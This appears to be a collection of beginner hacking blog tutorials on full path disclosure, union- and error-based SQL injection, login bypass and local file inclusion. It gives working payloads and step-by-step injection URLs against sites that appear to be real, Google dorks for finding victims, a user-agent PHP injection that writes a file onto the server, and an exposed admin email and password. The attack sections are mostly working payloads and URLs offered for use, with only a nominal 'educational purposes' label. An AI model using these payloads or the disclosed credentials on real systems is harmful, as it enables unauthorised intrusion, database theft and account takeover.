Getting Full Path Disclosure (FPD)

!! FOR EDUCATIONAL PURPOSES ONLY !!
I Introduction
Today i'm gonna teach you how to get the full path disclosure also known ass FPD

II Learning Basics
What is fpd?
FPD or Full Path Disclosure is an internal path structure of installation.
Example:
/home/www/htdocs/

Why attackers need fpd sometimes?
Attackers need it because they need the full path disclosure to deploy their backdoor shell.
This is very needed for uploading shell in sql injection, INTO OUTFILE
Example you visit the url www.website.com/index.php
in internal path, its /home/www/htdocs/index.php

III Getting Full Path Disclosure
1) Using Error.
in SQL Injection, you can already get the FPD if the error_reporting is enabled.
http://jornaldacidadearuja.com.br/guia/det.php?id=19'
If you see the error
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/jornaldacidade/public_html/site/include/mysql.inc.php on line 142
You already got the FPD, Ez.

2) Using empty array
example this is the page
www.website.com/page=about
Lets make the variable page an empty array
www.website.com/page[]=about

So after doing it, you'll see an error if the error_reporting is enabled.

Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84 Warning: pg_num_rows(): supplied argument … in /usr/home/example/html/pie/index.php on line 131

3) Google Dorks

You can use google dorks to find the FPD of the website,

example dork:

Warning: * [function.*]: site:www.website.com

Or you can use dork to use this dork

ip:xxx.xxx.xxx.xx * [function.*]:

You can make your own dork if you want

IV Goodbye

So that's all for now, hope you enjoy my post if you have some question or feedback please feel free to say it in comment!

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! today i'm gonna teach you how to DIOS in union based SQL Injection

II Learning Basics
So here we go again you need to learn the basics. Ofcourse you already knew it i just want to repeat lol.

1)Google dorks
what is google dorks? 
Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

II Finding target
google : " inurl:news.php?id= "
You can do your own google dork if you want, the common dorks is

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

III Checking if vulnerable to SQL Injection
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : http://jornaldacidadearuja.com.br/guia/det.php?id=19

You'll add a colon " ' " to the end of the number
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

now if you see an errored text or lookes like the page doesnt look normal, then theres a chance that its vulnerable to SQL injection
but if the page loads normally, too bad. Its not vulnerable.

What to do if its not vulnerable?
ofcourse find another website xD

IV Counting vulnerable columns
After you find it vulnerable to SQL injection, its time to count the columns using the order by.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
increase the number 1 until you you get an error

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10--("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000--("No error?!!")

So if that things happen you got in 99999 and still no error.
that means the ID is a string, not integer.

So how we will fix it?
Just simply add " ' " after the start and add " + " in the end.
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start:
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! we know that there is 18 columns. Now we will check now what is the injectable column!

V Getting injectable column
Now we knew there is 18 columns, we will now get the injectable column
Our payload will be " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 "
so the url will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Heyy! Column 6 is injectable column

VI DIOS ( Dump In One Shot )
Our payload for Dump In One Shot is (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And wolah! dumped in one shot!

VII Magic Quotes enabled
If it didn't worked for you then lets say the magic quotes enabled.
What is magic quote?
magic quote is replace the " ' " to " \' "
How to bypass it?
Its easy. Just hex those stringed texts. The payload will be
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)

VIII Goodbye
So hope you learned something in this tutorial, if you have some questions and feedback please feel free to comment!

SQL Injection Login Bypass

!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today i'm gonna teach you how to bypass the login panel using SQL Injection.

II Learning Basics
1) Google Dorks
what is google dorks? Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:login.php "
you'll see the results like www.website.com/login.php

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia

3)SQL injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database

III Finding target
After learning some basics, we will now get a target using google dorks,
Examples of google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php

IV Bypass Login
So after fnding a target, we will now try to bypass it
example this is our target
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in using " a' or '1'='1 " (without quotes) for password and email.
And bam! we successfully bypassed the login!

Why?
Example this is the query

select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;

the or '1'='1'  will make the statement true no matter what.

V Extras
If the " a' or '1'='1 " didin't work you can use some of this
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('

VI Goodbye
That's all for now hope you enjoyed my tutorial! If you have some feedbacks or question please feel free to comment.

Error based mapper and Union based mapper Chrome Extension

Error based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCZmItbnpGRVpEaWc
Union based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCQmtta2ZIZkd5MVE
Open source chrome extension made by z3r07y-kn0w

Installation:
Step 1) Extract the rar
Step 2) go to chrome://extensions
Step 3) check developer mode
Step 4) load unpacked extension
Step 5) click options of the chrome extension

Using:
Well i don't also know how to use it but its really easy to learn so good luck!

LFI (Local File Inclusion) 100% noob [BASIC]

!! FOR EDUCATION PURPOSES ONLY !

I Introduction
Hey guys today im gonna teach you LFI (Local File Inclusion).

II Learning Basics
So first we will now learn some basics

1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:index.php?page=news.php "
you'll see the results like www.website.com/index.php?page=news.php

So what's next?

2) LFI

Local File Inclusion is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application

IV Getting backdoor using LFI

So first, we will try to read /etc/passwd to see if its Directory Traversal

../ is used to go in upper directory / parent directory

www.website.com/index.php?page=/etc/passwd

www.website.com/index.php?page=../etc/passwd

www.website.com/index.php?page=../../etc/passwd

www.website,com/index.php?page=../../../etc/passwd (Worked!)

Next, we will not try to get the /proc/self/environ to execute PHP Scripts

www.website,com/index.php?page=../../../proc/self/environ (Worked!)

To check if it works you should see something like this

,

DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA

If you see something like 'HTTP_USER_AGENT=Mozilla' then you're good to go

it could execute php code when requested.

a) If you're using google chrome then its easier because you dont need to download any extensions/add-ons

Step 1) Press f12
Step 2) Click Toggle device mode
Step 3) Click responsive

Step 4) Click Edit
Step 5) Add custom device..
Step 6) Add any device name and we will edit the User Agent later

b) If you're using mozilla, download Live HTTP Headers or Tamper Data

So change the User Agent to <?php phpinfo() ?>
Then if you see phpinfo(), change the useragent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go, Well done.

V Read files using LFI
Ok lets make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php

you'll see a base64 encoded. Decode it in http://shunz19.blogspot.com/2016/04/string-tools.html

So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')"  Ez, the email is admin@icrpv5.org and password is 2015icrpvB4L1

VI Tips
If you use /proc/self/environ and it doesnt load
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly have been made "impossible" in newer versions of apache(the most used web server)

Some Common log Files:=>

/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log

VII Goodbye
If you have some feedback and question please feel free to comment! thats all for now, bye!

String tools

Error Based SQL Injection 100% Noob! [BASIC]

!! FOR EDUCATION PURPOSES ONLY !!

I introduction
Hey guys.. Today im gonna teach you error based SQL Injection!
What is the difference between Union Based and Error based?
The difference between Union and Error based are
1) union is harder than error based i think
2) Union based is where you will select all the columns and inject in the injectable column. While error based is you'll make an error that will dump the information
3) You dont need to count the vulnerable columns in error based.


II Learning basics
So first we will now learn some basics

1) Google Dorks
what is google dorks? 
Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

So what's next?

2) SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia

3) SQL Injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database

so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.

III Gathering
So after learning some basics we will now gather some information

Part 1 : Finding target website
To find a target website, we will need to use google dorks
lets google : " inurl:page.php?id= "

You can make your own dork if you want, here is some examples :

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19

inurl:buy.php?id=19

So get some target and lets start.

Part 2 : Checking if vulnerable
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

If you see something like this :
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

if it doesnt load normally and it shows an error that doesnt look like that, i suggest you checking my article about union based sql injection

If it loads normally, then you should get another target

Part 3 : Getting right comment
So after we learn how to check if its vulnerable to error based, we will now check check the right comment. So try adding " '--+ " after the ID number.
the url now will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+

If page loads normally then the id is a string, but if the page loads with error then the id is integer, then the comment is --
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--

In my target, the right comment is '--+

Part 4 : Checking version
So lets verify that its really vulnerable to Error Based by getting version
so simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

there we go we got the version

Duplicate entry '5.5.48-cll:1' for key 'group_key'

the version of mysql is 5.5.48-cll

Part 5 : Getting databases
After getting the version,we will now get the database names this is our payload +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

And there we go! we got the database name. If you want to check for other databases then use this payload +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

so the link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'information_schema~1' for key 'group_key'

so the first database is information_schema

now increase the LIMIT in the payload by 1 to check the next database name.

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'leettime_761wHole~1' for key 'group_key'

Second database name is leettime_761wHole . Then lets check the third database

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

If the page loads normally, then the third base doesnt exist.

Part 6 : Getting tables

After getting the database names, we will now try to get the tables of that database.

the database name in my target is leettime_761wHole

go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"

Our payload to get the database is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So our link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'testtable1~1' for key 'group_key'

The first table is : testtable1
lets check for the another table by increasing the limit by 1

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'userlogs~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'users~1' for key 'group_key'

And keep increasing the limit number to get the tables

Part 7 : Getting columns
So after getting tables and databases, we will now get the columns.

Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

so the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
add 0x also.

The url will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'id~1' for key 'group_key'

the first column is id, again, increase the limit to get the next column

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'username~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'password~1' for key 'group_key'

and again and again...

Part 8 : Dumping data

After we got the database, table and columns.. Now its time to dump the data! YAY!

Our payload to get dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

* NOTE: YOU CANNOT GET MULTIPLE COLUMNS. LIKE username,0x3a,password . IT WILL NOT WORK *

So the url will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'admin~1' for key 'group_key'

again, increase the limit by 1.

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'decompiler~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'devilhunte~1' for key 'group_key'

and increase then increase then increase.

IV Getting login panel

So what's the point of getting the login credentials if you're not gonna use it for login?

Some of passwords are hashed, like md5,SHA1 etc.. You can decrypt those md5 and others in md5online.com , crackstation.net , 

There is so many tools to get the login panel, but the common panels are

www.website.com/admin

www.website.com/administrator

www.website.com/admin.php

www.website.com/administrator.php

www.website.com/login.php

www.website.com/cms

V Goodbye

Thank you for reading this tutorial hope you learn something! If you have some questions or feedback please don't hesitate to comment!

logo

Union based SQL Injection 100% noob [BASIC]

!! WARNING FOR EDUCATION PURPOSE ONLY !!

I : Table Of Contents
I : table of contents
II : introduction
Step 1 : Learning basics
Step 2 : Finding target Website
Step 3 : Cheking if vulnerable to SQL Injection
Step 4 : Getting vulnerable columns
Step 5 : Getting injectable column

Step 6 : Getting Version
Step 7 : Getting database

Step 8 : Getting tables
Step 9 : Getting columns
Step 10 : Dumping data
Step 11 : Logging in to admin panel or login panel
Tips
Goodbye

II : Introduction

So this is my first tutorial and my second post..
Today im gonna teach you about ummm let see what i can teach, about how to watch pr0nz i mean how to hack a website through sql injection

Step 1 : Learning basics
1)Google dorks
what is google dorks? Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

so whats next?

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia

3)SQL injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database

so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.

Step 2 : Finding target website
google : " inurl:news.php?id= "
You can do your own google dork if you want, the common dorks is

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

Step 3 : Checking if vulnerable to SQL Injection
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

now if you see an errored text or lookes like the page doesnt look normal, then theres a chance that its vulnerable to SQL injection
but if the page loads normally, too bad. Its not vulnerable.

What to do if its not vulnerable?
ofcourse find another website xD

Step 4 : Getting vulnerable columns
After you find it vulnerable to SQL injection, its time to count the columns using the order by.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1--
increase the number 1 until you you get an error

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1-- ("No error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 2-- ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 10--("No error?!")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 100000--("No error?!!")

So if that things happen you got in 99999 and still no error.
that means the ID is a string, not integer.

So how we will fix it?
Just simply add " ' " after the start and add " + " in the end.
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+

Start:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+ ("Error!!!!")

Error While Selection process : Unknown column '4' in 'order clause'

There we go! we know that there is 3 columns. Now we will check now what is the injectable column!

Question:
What is the " -- "
the -- is a comment

Step 5 : Getting Injectable column
We will now get the injectable column! So there is 3 columns. so
simply add a negative sign ( - ) before the number and add union select

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

And there it is!
Username is : 2

The Column 2 is injectable! So we will inject our Malicious SQL Statement!

Step 6 : Checking version
So before getting informations, lets check the version first by simply changing the 2 to @@version . so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,@@version,3--+

Username is : 5.5.48-cll

If The version is greater than or equal to 5 then you can proceed if its lessthan 5 then too bad i recommend you to change target website but if you really wanna hack it then i suggest you to try Blind SQL in other tutorials but its so hard so i never tried it

Step 7 : Getting database
Now we got the injectable column, we will now check the name of database!
Simply change the 2 to database()
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+

There ya go!
Username is : leettime_761wHole

Now we know that the database name is leettime_761wHole

Save the database name, we will use it.

Step 8 : Getting tables
After we get the database name, we will now get the table of database.
go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"

So simply change the 2 to (select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65)

So it will be:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65),3--+

and there you go!
Username is : testtable1,userlogs,users

We got the tables! Now we have to get the columns.

Step 9 : Getting columns
Just hold on! we're close now. Now we have to get the columns.
Again you need to hex the table name and add 0x in the start so
Users = " 0x7573657273 "
then simply change the 2 to (select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)

so the link will be
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

There we go again!
Username is : id,username,password,user_type,sec_code

Step 10 : Dumping data
So this will be the easiest one i think? because its dump data time!!
simply change the 2 to (select group_concat(columns) from database.table)
so (select group_concat(username,password) from leettime_761wHole.users)

So the link will be:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,password) from leettime_761wHole.users),3--+

And now :D
Username is : injectorkhan,decompilerhacktract,devilhuntedante,Zensec-idiots,Zenodermussecurity-i,grayhathacker,khanhaxor,adminsadmin

Oh wait we forgot the seperator! lets just simply add 0x3a.
What is 0x3a?
0x3a when decoded to hex is " : " we will use it as seperator for our columns to recognize what is username and password. group_concat(username,0x3a,password)

so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from leettime_761wHole.users),3--+
Username is : injector:khan,decompiler:hacktract,devilhunte:dante,Zen:sec-idiots,Zenodermus:security-i,grayhat:hacker,khan:haxor,admin:sadmin
Yeah there ya go time for checking from some admin panel to access

Step 11 : Logging in to admin panel or login panel
some passwords are hashed to md5 you can crack the hash using md5online.com , crackstation.net , hash-killer.co.uk and etc

So now we got the login credentials, we will now get the login page or admin page to login to have access in the site.
There is common links:
www.website.com/admin
www.website.com/administrator
www.website.com/login.php
www.website.com/admin.php
www.website.com/administrator.php

Tips
If you want to check all the database this is the code:
(select group_concat(schema_name) from information_schema.schemata)

Goodbye
Hope you enjoyed my post and learned something! If you have questions or feedback please feel free to comment!